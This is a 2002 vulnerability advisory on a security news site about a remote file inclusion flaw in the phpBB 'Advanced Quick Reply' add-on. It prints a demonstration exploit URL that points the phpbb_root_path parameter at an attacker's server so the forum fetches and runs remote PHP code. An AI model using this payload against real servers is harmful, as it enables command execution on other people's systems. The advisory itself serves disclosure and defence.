Main Menu
Network
Sponsor
Top 10 Sites
Partners
|
|
Top Submit newsSubscribe 
Communication | Computer Crime | Digital Audio, Video, Photo | General News | Hardware | Internet | Mobile | PDA | Security | Software | Vulnerability |
Previous articleBack to news listNext article
| Sponsored links | Want to become one of our authors and see your work published on ALLSeek.iNFO ?
| | phpBB 'Advanced Quick Reply' Hack Input Validation Flaw Lets Remote Users Execute Commands on the Server |
|---|
Categorie: Vulnerability
Posted: 2002-11-20 by ReCall
Views: 396
Source: Click here
| Current Rating: Not rated
|
| | Details |
|---|
Description: An input validation vulnerability was reported in the Advanced Quick Reply hack for the phpBB forum. A remote user can execute shell commands on the server.
It is reported that a remote user can cause remotely located PHP scripts to be executed on the target server because of a flaw in specifying the target directory for the '$phpbb_root_path' variable.
To exploit this, the user must create malicious PHP code on an arbitrary remote server (a server that the remote user controls or has access to). Then, the remote user can send a specially crafted URL to the target web server to cause the target web server to execute the malicious PHP code. The code will be executed with the privileges of the web server process.
As a demonstration exploit, the user can create a file 'extension.inc' on 'YourServer' and then call the following URL to cause the PHP code in 'extension.inc' to be executed on the target phpBB server:
http://[phpBB_Forum]/quick_reply.php?phpbb_root_pat h=http://[YourServer]/&mode=smiles
Impact: A remote user can execute arbitrary shell commands on the server with the privileges of the web
daemon.
Solution: No solution was available at the time of this entry. The author of the report has provided an
unofficial patch, available in the Source Message.
| | Syndication |
|---|
Permalink Email this
The URI to TrackBack this entry is:
http://allseek.info/news/trackback.php?id=331
| | User comments (post your comments ) |
|---|
Only registerd members can post comments and articles
|
| Previous articleBack to news listNext article
|
|
|
|
InterJOB.su
|
